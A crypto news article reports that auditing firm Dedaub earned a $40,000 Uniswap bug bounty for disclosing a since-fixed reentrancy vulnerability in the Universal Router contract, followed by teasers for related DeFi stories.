DeFi auditor nets $40,000 for identifying Uniswap vulnerability

Published at: Jan. 4, 2023

Uniswap’s recently launched bug bounty program has led to the discovery of a now-fixed vulnerability of the protocol’s Universal Router smart contract.

The automated market maker released two new smart contracts to its platform in November 2022. Permit2 allows token approvals to be shared and managed across different applications, while Universal Router unifies ERC-20 and nonfungible tokens (NFTs) swapping into a single swap router.

Uniswap also advertised a lucrative bug bounty program to identify potential vulnerabilities in its smart contracts towards the end of 2022 as it looked to assure the safety and efficacy of its protocol.

Smart contract security and auditing firm Dedaub announced that it had received a bug bounty after flagging a vulnerability in the Universal Router smart contract that would have allowed reentrancy to drain user funds mid-transaction.

The Dedaub team has disclosed a Critical vulnerability to the Uniswap team!Funds are safe - Uniswap addressed the issue and redeployed the Universal Router smart contracts on all its chains The vulnerability allows re-entertrancy to drain the user's funds, mid-tx. pic.twitter.com/wFSFsohPvy

— Dedaub (@dedaub) January 2, 2023

According to Dedaub’s breakdown, the Universal Router allows users to perform diverse actions including swapping multiple tokens and NFTs in one transaction.

The router embeds a scripting language for a wide variety of token actions, which could include transfers to third party recipients. If correctly implemented, transfers would go to the recipient within specified parameters.

Related: Immunefi says it has facilitated $66M in bug bounties since inception 

However, Dedaub identified a vulnerability in which a third-party code was invoked during the transfer, allowing the code to re-enter the Universal Router and claim any tokens that were temporarily in the contract.

Dedaub then suggested a straight-forward remedy, advising the Uniswap team to add a reentrancy lock to the core execution of the new router. Uniswap awarded the auditing firm a total of $40,000 for flagging the vulnerability. The amount included a 33% bonus for reporting the issue during Uniswap’s bonus period in November 2022.

Uniswap classified the issue as medium severity, while further assessment deemed the vulnerability to have high impact and low likelihood. According to Dedaub, the possibility of a user sending NFTs to an untrusted recipient directly was considered user error.

More complex and less likely scenarios were considered valid for reentrancy, which resulted in Uniswap deeming the vector to have a low likelihood.

Bug bounties have become commonplace in the cryptocurrency and blockchain space as platforms and companies look to ensure the security of their software, systems and infrastructure. 

Cryptocurrency exchange Coinbase recently clarified the terms of its bug bounty, while blockchain security firm Immunefi has facilitated over $65 million worth of bug bounties between ethical hackers and Web3 firms in 2022.

Tags
Blockchain
Defi
Decentralized Exchange
Uniswap
Security
Related Posts
Bitcoin correction heralded as a ‘BTD’ opportunity, but what about DeFi?
Cryptocurrency investors are still picking up the pieces from the May 19 market-wide implosion which saw Bitcoin (BTC) drop to an unexpected low at $30,000. Post-mortem analysis now shows that the correction catalyzed a mad dash among traders running for the exits as the cascading sell-off resulted in a record 10,525 BTC liquidated across all exchanges. Altcoins were quick to follow suit as they joined Bitcoin in its plunge and hardly a token was left unscathed by the downturn as a wider-sell-off rippled across the market, resulting in a $437 billion haircut to the total market capitalization to $1.672 trillion, …
Blockchain / May 20, 2021
DEXs becoming unusable? How to navigate record gas fees ahead of Eth2
While Bitcoin (BTC) has been in the spotlight since the start of the year, and even more so given the recent $1.5-billion Tesla purchase, Ether has not been lagging behind. Ether (ETH) is currently sitting at $1,800, and its network has now processed over 1 billion transactions, mostly on the back of the DeFi sector and also due to growing institutional engagement. According to Lanre Jonathan Ige, research associate at 21Shares — a European issuer of crypto Exchange Traded Products — “Investors understand that Bitcoin is part of a wider asset class and are now attempting to diversify past Bitcoin.” …
Technology / Feb. 13, 2021
DeFi liquidity pools, explained
How can I join DeFi liquidity pools? The exact procedure for joining DeFi liquidity pools varies according to the platform. In general, one would need to set up an account on the platform of choice and then connect an Ethereum wallet such as MetaMask or other Web 3.0 wallets from the homepage. After that, tokens can be deposited into the relevant liquidity pool. On platforms, such as Uniswap, one would need to search for a specific pair they want to provide liquidity to and then connect the wallet. After checking the returns, such as the pool ratio and the exchange …
Blockchain / Jan. 28, 2021
A feature allowing anonymous Uniswap trading has returned
Uniswap serves as a massive player in the decentralized finance, or DeFi, niche of the crypto space. Incognito, a blockchain focusing on crypto privacy, has reopened pUniswap, a way to participate on Uniswap privately. “Uniswap, Ethereum’s largest DEX, just went Incognito. Again,” Incognito announced in a blog post on Thursday. Aimed at enhancing the project, Incognito put pUniswap on hold back in September. Participating in the DeFi ecosystem often means interacting with the Ethereum blockchain, as many platforms operate on its network. That said, some folks value privacy. Without pUniswap, transactions on the DeFi exchange can be traced back to …
Decentralization / Dec. 10, 2020
Celo foundation proposes to deploy Uniswap V3 on its native blockchain
A new community proposal was introduced in the Uniswap governance forum to deploy the protocol on the Celo blockchain, which is a mobile-first, carbon-negative and Ethereum Virtual Machine-compatible network. The new proposal was created on behalf of Blockchain at Michigan, and in partnership with the Celo Foundation and the Celo Climate Collective. Once passed, Uniswap will be accessible to nearly six billion mobile phone users. Currently, MetaMask mobile app enables using Uniswap or other decentralized exchanges via an in-app browser. The Celo foundation will commit $10 million of CELO in Uniswap-specific user incentives and grants along with $10 million in …
Adoption / March 11, 2022